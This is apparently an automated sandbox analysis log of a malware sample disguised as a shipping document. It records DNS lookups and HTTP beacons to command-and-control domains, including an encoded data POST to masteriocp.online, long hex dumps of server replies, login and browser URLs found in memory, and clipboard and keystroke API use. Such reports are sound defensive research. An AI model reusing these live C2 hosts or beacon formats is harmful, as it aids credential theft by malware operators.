            Source: global trafficHTTP traffic detected: GET /wwak/?gd=E3TGpDthwwVtcd68e7GptjCB6e8kOO0p076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUcyNJNhtpQgsemRCiUIU53imXlsG7IfaIBm8=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdH HTTP/1.1Host: www.quantumnests.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n59g/?a0=_6Edzvj0xtFLdH&gd=5pnE2UHiCW8ObGXd+5watRyj/n5k8DcBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ndPNw6uI/UGywwOjVsQmNLB0fJ9Ua+cFGcM= HTTP/1.1Host: www.parcelfly.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: global trafficDNS traffic detected: DNS query: www.independent200.org
            Source: global trafficDNS traffic detected: DNS query: www.tigre777gg.online
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global trafficDNS traffic detected: DNS query: www.quantumnests.xyz
            Source: global trafficDNS traffic detected: DNS query: www.abbabyfernando.online
            Source: global trafficDNS traffic detected: DNS query: www.parcelfly.net
            Source: global trafficDNS traffic detected: DNS query: www.siyue.xyz
            Source: unknownHTTP traffic detected: POST /p5rq/ HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USConnection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.masteriocp.onlineReferer: http://www.masteriocp.online/p5rq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d Data Ascii: gd=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 14 Sep 2024 09:11:57 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 14 Sep 2024 09:11:59 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 14 Sep 2024 09:12:04 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Sep 2024 09:12:45 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Sep 2024 09:12:48 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Sep 2024 09:12:50 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Sep 2024 09:12:53 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3568694635.0000000004CD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.parcelfly.net
            Source: PrWIbKXhdqUKk.exe, 00000008.00000002.3568694635.0000000004CD4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.parcelfly.net/n59g/
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.3565934863.000000000329F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2359661793.000000000800F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3569382818.00000000065A0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3567902266.0000000004CF2000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000003732000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: netbtugc.exe, 00000006.00000003.2367744209.0000000008028000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000006.00000002.3567902266.0000000004518000.00000004.10000000.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567310528.0000000002F58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/p5rq/?gd=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E7407C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E7427A
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E7407C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E6003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E6003A
